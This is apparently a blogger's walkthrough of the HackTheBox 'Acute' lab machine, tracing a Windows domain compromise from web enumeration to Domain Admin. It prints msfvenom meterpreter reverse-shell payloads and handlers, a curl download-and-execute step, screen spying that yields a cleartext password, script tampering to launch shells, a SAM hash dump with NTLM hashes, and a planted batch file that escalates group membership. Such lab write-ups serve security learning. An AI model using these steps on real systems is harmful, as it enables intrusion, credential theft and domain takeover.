HTB -Acute
Machine Info
Acute is a hard Windows machine that starts with a website on port 443. The certificate of the website reveals a domain name atsserver.acute.local. Looking around the website there are several employees mentioned and with this information it is possible to construct a list of possible users on the remote machine. Enumerating the website reveals a form with procedures regarding newcomers to the company. The form reveals the default password that all accounts are initially set up with. It also reveals a link for a Windows PowerShell Web Access (PSWA) session. Combining all the available information from the enumeration process an attacker is able to get into a PowerShell session as the user edavies on Acute-PC01. Then, it is discovered that the user edavies is also logged on using an interactive session. Upon spying on the actions of edavie the clear text password of the imonks user for ATSSERVER can be retrieved. The user imonks is running under Just Enough Administration (JEA) on ATSSERVER, but even with the limited command set an attacker is able to modify a script on ATSSERVER in order to make edavies a local administrator on Acute-PC01. Now that edavies is a local administrator the HKLM\sam and HKLM\system can be retrieved from the system in order to extract the password hashes of all the users. The administrator hash turns out to be crackable and the clear text password is re-used for awallace on ATSSERVER. The user awallace is able to create BAT scripts on a directory where the user Lois will execute them. Lois has the rights to add imonks to the site_admin group which in turn has right access to the Domain Admins group. So, after imonks is added to the site_admin group he can add himself to the Domain Admins group and acquire administrative privileges.
Enumeration
Scope
IP Address: 10.10.11.145
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
443/tcp open https
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
| ssl-cert: Subject: commonName=atsserver.acute.local
| Subject Alternative Name: DNS:atsserver.acute.local, DNS:atsserver
| Not valid before: 2022-01-06T06:34:58
|_Not valid after: 2030-01-04T06:34:58
|_ssl-date: 2024-07-22T08:03:32+00:00; 0s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows* Open ports: 443
* Services: HTTPS
* Important notes: DNS:atsserver.acute.local, DNS:atsserverFirst, I added the domain name, FQDN and computer name to hosts file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ sudo sh -c "echo '$ip acute.local atsserver.acute.local atsserver' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.145 acute.local atsserver.acute.local atsserverHTTP Enumeration
subdomain enumeration didn't get anything
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/GreenHorn]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.acute.local" -k -t 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Progress: [19966/19966] :: Job [1/1] :: 208 req/sec :: Duration: [0:01:35] :: Errors: 0 ::https://acute.local/
However, atsserver.acute.local has a webapp
Several users found but I need to know the format of each user.
In the top right of the page, there is a link to .docx file
When I clicked it, It downloaded the file to my kali machine, So I will explore it locally.
Looking at the file details:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ exiftool New_Starter_CheckList_v7.docx
<snip>
Zip File Name : [Content_Types].xml
Creator : FCastle
Description : Created on Acute-PC01
Last Modified By : Daniel
<snip>The Creator of the file is Fcastle which is not in my users list, So I will add him first along with Daniel by whom the file was modified. Also, it gave us a hint that the username format is First Letter from first name + Last name So the user list should be like this:
Fcastle
Awallace
Chall
Edavies
Imonks
Jmorgan
LhopkinsAnother important thing is Created on Acute-PC01 which tell us that there is a computer name called Acute-PC01.
So, we have now two computer names
atsserver
Acute-PC01I opened the docx file and it looks like this:
There are two new links that I want to explore.
https://atsserver.acute.local/Staff
https://atsserver.acute.local/Staff/InductionThe two pages respond with 404
This raw tells that the default password is Password1! and several users have this passwords
PSWA means PowerShell Web Access and dc_manage seems to be kind of restrictions or something.
The last raw has a link when clicked it, it takes me to https://atsserver.acute.local/Acute_Staff_Access
At the end, I can see that there is a group with name site admin and Lois has control of it.
Shell ad Edavies
https://atsserver.acute.local/Acute_Staff_Access
It's a PowerShell web Access Console, I have the password, two computer names and several users. I will try them.
When providing wrong credentials, this message appears
A new message appears with user Chall says that we aren't authorized to connect to that computer name, So I will try the other one.
When I changed the computer name to Acute-PC01 and try to authenticate with chall, it also failed However, when tried with Edavies it took me to the PowerShell Console.
Jmorgan & Natasha exists on the machine along with edavies.
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/21/2021 1:01 PM administrator.ACUTE
d----- 12/22/2021 1:26 AM edavies
d----- 12/21/2021 10:50 PM jmorgan
d----- 11/19/2021 9:29 AM Natasha
d-r--- 11/18/2020 11:43 PM PublicPS C:\Users> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==============================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled g
roup
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled g
roup
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled g
roup
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled g
roup
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled g
roup
Mandatory Label\Medium Mandatory Level Label S-1-16-8192I want to see who is a member on Remote Managment users but when asked the domain it failed, So I switch to query local group and got a result
PS C:\Users> net group "Remote Management Users"
net : This command can be used only on a Windows Domain Controller.
+ CategoryInfo : NotSpecified: (This command ca...ain Controller.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
More help is available by typing NET HELPMSG 3515.
PS C:\Users> net localgroup "Remote Management Users"
Members
-------------------------------------------------------------------------------
ACUTE\edavies
The command completed successfully.I also looked at administrators group and I found that Jmorgan is a member of it.
PS C:\Users> net localgroup "administrators"
Members
-------------------------------------------------------------------------------
ACUTE\Domain Admins
ACUTE\jmorgan
AdministratorI need to upgrade my shell, So I can use nc or meterpreter shell. In our situation, meterpreter shell is better and we will know why after few steps.
At root file system, there is a non-standard folder Utils
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/7/2019 9:14 AM PerfLogs
d-r--- 12/6/2021 11:06 AM Program Files
d-r--- 12/7/2021 12:43 PM Program Files (x86)
d-r--- 12/21/2021 10:50 PM Users
d----- 1/31/2022 12:29 AM Utils
d----- 12/16/2021 1:23 AM WindowsViewing the folder permission, I found the edavies has (M) modify permission which means he can Read, Wirte, Execute, Delete.
PS C:\> icacls Utils
Utils NT AUTHORITY\SYSTEM:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
ACUTE\edavies:(OI)(CI)(M)
BUILTIN\Users:(OI)(CI)(R)I don't know why this folder exists but I will continue from this folder as I have permissions on it.
Creating a meterpreter shell
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=443 -f exe -o shell.exe
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exeStarting MetaSploit framework and start listening
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.16.7
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.10.16.7:443 Download the shell and execute it.
PS C:\Utils> curl 10.10.16.7/shell.exe -o .\shell.exe
PS C:\Utils> .\shell.exeReceiving a connection back
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 1 opened (10.10.16.7:443 -> 10.10.11.145:49848) at 2024-07-22 05:06:10 -0400
meterpreter > getuid
Server username: ACUTE\edaviesShell as imonks
Personally, I didn't know what to do next as no escalation path was clear to me, So I got a hint that you can use
screensharefeature frommeterpretersession to capture desktop screenshot.
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/study/Courses/HackThebox/HTB/machines/Acute/UjBPiFCw.html
[*] Streaming...An html page is opened, and I waited for something can be useful
If you get error like this:
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>use the following command:
meterpreter > screenshare --interact 1 --timeout 30000After few moments, A new PowerShell console is opened, and several commands is entered
Enter-PSsession -Computername atsserver
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd) I now get new user credentials imonks:W3_4R3_th3_f0rce.
I also notice that when tried to connect with PSSession it failed, and it used dc_manage configuration file.
At meterpreter, I started a shell and try to execute command as imonks
$passwd = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("acute\imonks", $passwd)Enter-PSSession failed as we saw in screenshot, So I will try Invoke-Command and successfully :)
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\imonksInvoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls -Recurse C:\Users\imonks}
Directory: C:\Users\imonks
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d-r--- 21/12/2021 22:29 Desktop atsserver
d-r--- 21/12/2021 16:01 Documents atsserver
d-r--- 15/09/2018 08:12 Downloads atsserver
d-r--- 15/09/2018 08:12 Favorites atsserver
d-r--- 15/09/2018 08:12 Links atsserver
d-r--- 15/09/2018 08:12 Music atsserver
d-r--- 15/09/2018 08:12 Pictures atsserver
d----- 15/09/2018 08:12 Saved Games atsserver
d-r--- 15/09/2018 08:12 Videos atsserver
Directory: C:\Users\imonks\Desktop
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-ar--- 22/07/2024 08:58 34 user.txt atsserver
-a---- 11/01/2022 18:04 602 wm.ps1 atsserver The user flag is there along with wm.ps1 file.
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\user.txt}
42fd899d0cffc822513f80xxxxxxxxxxxxxUser Flag: 42fd899d0cffc822513xxxxxxxxxxxxx
Shell as Jmorgan
wm.ps1 contain PowerShell Credentials of Jmorgan user which we know that he is local admin at Acute-PC01
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $credsI couldn't run the script as it as Edavies because he isn't the user that creates this file, So I will try to run the script as imonks to get a shell as jmorgan.
But first I will modify this script to send me a shell.
Creating meterpreter shell to receive connection as jmorgan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Acute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.7 lport=8443 -f exe -o jmorgan.exe
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: jmorgan.exeStart to listen with MetaSploit
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.7:8443
msf6 exploit(multi/handler) > jobs
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://10.10.16.7:8443I want to modify the wm.ps1 script, So I typed Get-Commnad to see available commands I can run
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Command}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Cmdlet Get-Alias 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-ChildItem 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Command 3.0.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Get-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Content 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Set-Location 3.1.0.0 Microsoft.PowerSh... atsserver
Cmdlet Write-Output 3.1.0.0 Microsoft.PowerSh... atsserver
PS C:\Utils> Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Get-Alias}
CommandType Name Version Source PSComputerName
----------- ---- ------- ------ --------------
Alias cat -> Get-Content atsserver
Alias cd -> Set-Location atsserver
Alias echo -> Write-Output atsserver
Alias ls -> Get-ChildItem atsserver
Alias pwd -> Get-Location atsserver
Alias sc -> Set-Content atsserver
Alias type -> Get-Content atsserver I will use Set-Content to add the following lines to the script
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value '$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $creds' -Path C:\Users\imonks\Desktop\wm.ps1}Check everything is correct
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\imonks\Desktop\wm.ps1}
$securepasswd = "01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51"
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {PowerShell -c C:\Utils\jmorgan.exe} -ComputerName Acute-PC01 -Credential $credsTrigger the Script
Invoke-Command -Credential $cred -ComputerName atsserver -ConfigurationName dc_manage -ScriptBlock {C:\Users\imonks\Desktop\wm.ps1}
[*] Sending stage (201798 bytes) to 10.10.11.145
[*] Meterpreter session 2 opened (10.10.16.7:8443 -> 10.10.11.145:49786) at 2024-07-22 06:04:23 -0400msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows ACUTE\edavies @ ACUTE-PC01 10.10.16.7:443 -> 10.10.11.145:49848 (172.16.22.2)
2 meterpreter x64/windows ACUTE\jmorgan @ ACUTE-PC01 10.10.16.7:8443 -> 10.10.11.145:49786 (172.16.22.2)
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: ACUTE\jmorganPS C:\Users\jmorgan\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session EnabledShell as awallace
I will use hashdump feature to dump hashes and try to crack it
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::Only Administrator hash was cracked using https://crackstation.net/
I want to know which users exists on atsserver
Invoke-Command -Credential $cred -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls C:\Users}
Directory: C:\Users
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 20/12/2021 23:30 .NET v4.5 atsserver
d----- 20/12/2021 23:30 .NET v4.5 Classic atsserver
d----- 20/12/2021 20:38 Administrator atsserver
d----- 21/12/2021 23:31 awallace atsserver
d----- 21/12/2021 16:01 imonks atsserver
d----- 22/12/2021 00:11 lhopkins atsserver
d-r--- 20/12/2021 20:38 Public atsserverI will try to authenticate as these users with the password of administrator I cracked
$password = ConvertTo-SecureString -AsplainText -Force 'Password@123'
$Credential = New-Object System.Management.Automation.PSCredential("acute\awallace", $password)A got a hit with awallace user
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {whoami}
acute\awallaceI tried to enumerate programs folder before with imoks but got Access Denied, So I will enumerate them again but with awllace user
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files"}
Directory: C:\Program Files
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
d----- 21/12/2021 00:04 common files atsserver
d----- 21/12/2021 00:11 Hyper-V atsserver
d----- 15/09/2018 08:12 internet explorer atsserver
d----- 01/02/2022 19:41 keepmeon atsserver
d----- 21/12/2021 00:04 VMware atsserver
d----- 20/12/2021 21:19 Windows Defender atsserver
d----- 20/12/2021 21:12 Windows Defender Advanced Threat atsserver
Protection
d----- 21/12/2021 14:13 WindowsPowerShell atsserver I will look again at keepmeon this time
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {ls "C:\Program Files\keepmeon"}
Directory: C:\Program Files\keepmeon
Mode LastWriteTime Length Name PSComputerName
---- ------------- ------ ---- --------------
-a---- 21/12/2021 14:57 128 keepmeon.bat atsserver Listing the content of the file gives this script
PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat "C:\Program Files\keepmeon\keepmeon.bat"}
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)Asking ChatGPT about the exact function of that script:
So, I can create .bat file and get it executed after 5 minutes as Lois the comment says. We also saw that Lois is the only user who can add members to Site_admin groups, So I will add jmorgan to that groups and get Domain Admins privileges
The comment field says that the site_admin group has access to domain admins
PS C:Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
The command completed successfully.Write a .bat file to add awallace to site_admin
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value 'net group site_admin awallace /add /domain' -Path "C:\Program Files\keepmeon\blind0bandit.bat"}After few minutes, the user is added
Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}
Group name Site_Admin
Comment Only in the event of emergencies is this to be populated. This has access to Domain Admin group
Members
-------------------------------------------------------------------------------
awallace
The command completed successfully.Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\Administrator\Desktop\root.txt}
d078dca1007c6bcdc86xxxxxxxxxxxxxxxRoot Flag: d078dca1007c6bcdxxxxxxxxxxxxxxxx
Last updated